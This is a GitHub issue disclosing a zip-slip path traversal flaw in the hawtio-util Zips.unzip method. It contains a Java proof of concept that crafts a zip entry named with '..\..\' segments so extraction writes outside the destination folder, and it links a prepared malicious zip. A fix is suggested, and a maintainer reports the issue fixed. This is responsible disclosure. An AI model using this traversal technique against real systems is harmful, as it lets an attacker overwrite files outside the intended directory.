Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Path Traversal when unzip zip file #2832

Closed
PoppingSnack opened this issue May 11, 2023 · 1 comment
Closed

Path Traversal when unzip zip file #2832

PoppingSnack opened this issue May 11, 2023 · 1 comment

Comments

@PoppingSnack
Copy link

Description

In the method "unzip" (line 111) of the file

public static void unzip(InputStream in, File toDir) throws IOException {
, it is possible to input malicious zip files, which can result in the high-risk files after decompression being stored in any location, even leading to file overwrite and other situations.

Proof of Concept

I use a maven project import the utility in pom.xml.

<dependency>
            <groupId>io.hawt</groupId>
            <artifactId>hawtio-util</artifactId>
            <version>2.17.2</version>
        </dependency>

Use the following zip() method to create a zip file from a txt file, and the name of the compressed file will be renamed to "....\a\b\c\poc.txt". (You should create this path firstly)
Then call the Zips.unzip() method, originally intended to unzip the file to "D:\project\TestProject\ICFuzzTest\testData\unzip", but it will eventually be extracted to its another directory "D:\project\TestProject\ICFuzzTest\a\b\c\poc.txt".
This may cause the original file to be overwritten by a high-risk file.

import io.hawt.util.Zips;

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;

/**
 * 在Hawtio中存在unZip方法,可能有路径穿越的问题
 */
public class HawtioUnzip {

//https://github.com/hawtio/hawtio/blob/268bca24c61c88c76ea661533514082954e38ed5/hawtio-util/src/main/java/io/hawt/util/Zips.java#L111
    public static void main(String[] args) throws IOException {
        zip();  // create a poc

        String zipFile = "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip\\poc.zip";
        String destination = "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip";
        InputStream in = new FileInputStream(zipFile);
        Zips.unzip(in, new File(destination));
    }

    // create a poc
    public static void zip() {
        ZipOutputStream zos = null;
        try {
            zos = new ZipOutputStream(new FileOutputStream(
                    "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip\\poc.zip"));
            String srcFile = "..\\..\\a\\b\\c\\poc.txt";  // the next filePath
            String destFile = "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip\\poc.txt";
            zos.putNextEntry(new ZipEntry(srcFile));
            FileInputStream in = new FileInputStream(destFile);
            int len;
            byte[] buf = new byte[1024];
            while ((len = in.read(buf)) != -1) {
                zos.write(buf, 0, len);
            }
            zos.closeEntry();
            in.close();
        } catch (Exception e) {
            throw new RuntimeException("zip error from ZipUtils", e);
        } finally {
            if (zos != null) {
                try {
                    zos.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
    }
}

The following is the constructed zip file:

https://github.com/Zlase0820/VulnData/blob/main/src.main/data/poc.zip

Suggestion

I think we can add a simple verification check on the path to avoid this issue. We can refer to other verification methods for unzip under Apache, such as:

https://github.com/apache/druid/blob/master/processing/src/main/java/org/apache/druid/utils/CompressionUtils.java#L242

He has the same error,and fixed in CVE-2023-27603.

tadayosi added a commit that referenced this issue May 17, 2023
@tadayosi
Copy link
Member

fixed

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants